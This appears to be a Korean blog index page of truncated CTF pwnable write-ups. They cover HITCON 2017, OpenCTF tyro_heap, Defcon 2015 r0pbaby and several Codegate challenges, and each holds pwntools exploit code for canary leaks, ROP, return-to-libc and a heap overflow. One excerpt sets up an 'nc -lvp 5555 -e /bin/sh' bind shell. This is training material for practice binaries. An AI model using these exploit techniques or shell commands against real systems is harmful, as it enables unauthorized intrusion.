Hacking/Pwnable (15) 썸네일형 리스트형 HITCON 2017 start write up syscall을 이용한 ROP였다. 예전부터 풀어야지 했다가 오늘 풀었다. from pwn import* context.log_level = 'debug' p = process("./start") read = 0x440300 bss = 0x6cdb68 syscall = 0x468e75 prdi = 0x4005d5 prsi = 0x4017f7 prdx = 0x443776 prax_rdx_rbx = 0x47a6e6 pay1 = "a"*25 p.send(pay1) p.recvuntil("a"*24) canary = u64(p.recv(8)) - 0x61 log.info("canary = " + hex(canary)) pay2 = "a"*24 pay2 += p64(canary) pay2 += "b"*8 #rea.. unlink #define unlink(P, BK, FD){ BK = P -> bk; FD = P -> fd; FD -> bk = BK; BK -> fd = FD; } FD = *P + 8 BK = *P + 12 FD + 12 = BK BK +8 = FD unlink 이해가 아직도 안 된다. 이해하고 문제 풀 예정 OpenCTF tyro_heap write up 매우 간단한 heap overflow chunk 2개 만들고 첫번째 chunk에서 overflow 시켜서 두번째 chunk에 puts@plt 있는데 이걸 쉘 함수로 overwrite 해주면 된다. from pwn import* p = process("./tyro_heap") shell = 0x8048660 p.sendline("c") p.recvuntil("::> ") p.sendline("c") p.recvuntil("::> ") p.sendline("b") p.recvuntil(": ") p.sendline("0") p.recvuntil(": ") p.sendline(p32(shell)*10) p.recvuntil("::> ") p.sendline("e") p.recvuntil(": ") p.send.. noe.systems double_input local shell 보호되어 있는 글입니다. Defcon 2015 r0pbaby libc랑 함수 주소를 알려준다. RTL from pwn import* p = process("./r0pbaby_542ee6516410709a1421141501f03760") print p.recvuntil(":") p.sendline("2") print p.recvuntil("Enter symbol: ") p.sendline("system") print p.recvuntil("Symbol system: 0x") system = int(p.recv(16),16) print "system = " + hex(system) pr = system - 0xdb2f binsh = system + 0x1479c7 print p.recvuntil(":") p.sendline("3") p.sendline("32") pa.. Codegate 2018 BaskinRobins31 그냥 ROP from pwn import*context.log_level = 'debug' p = process("./BaskinRobins31")e = ELF("./BaskinRobins31") read_plt = e.plt['read']read_got = e.got['read']write_plt = e.plt['write']puts_plt = e.plt['puts']bss = e.bss()binsh = "/bin/sh\x00"pr = 0x400bc3pppr = 0x40087a pay="A"*176pay+="B"*8pay+=p64(pr)+p64(read_got)+p64(puts_plt)pay+=p64(pppr)+p64(0)+p64(bss)+p64(len(binsh))+p64(read_plt)pay+=p.. 
Codegate 2017 babypwn 그냥 canary leak + RTL from pwn import* #context.log_level = 'debug' p = remote("localhost",8181) e = ELF("./babypwn") recv_plt = e.plt['recv'] system_plt = e.plt['system'] ppppr = 0x08048eec bss = e.bss() binsh = "/bin/sh>&4 ") p.sendline("1") p.recvuntil(":") pay="A"*41 p.send(pay) print p.recv(44) canary = u32("\x00"+p.recv()[41:44]) print "canary is " + hex(canary) p.recvuntil(">") p.sendline(.. Codegate 2014 nuclear 암호 leak하고 ROP from pwn import* context.log_level = 'debug' p = remote("localhost", 1129) e = ELF("./nuclear") libc = e.libc send_plt = e.plt['send'] send_got = e.got['send'] recv_plt = e.plt['recv'] bss = e.bss() ppppr = 0x0804917c cmd = "nc -lvp 5555 -e /bin/sh" binsh = "/bin/sh 0>&4 1") p.sendline("1.1/1.1") p.recvuntil(">") pay="A"*512 p.send(pay) print p.recv(1024) ''' p.sendline("launch") p.. 이전 1 2 다음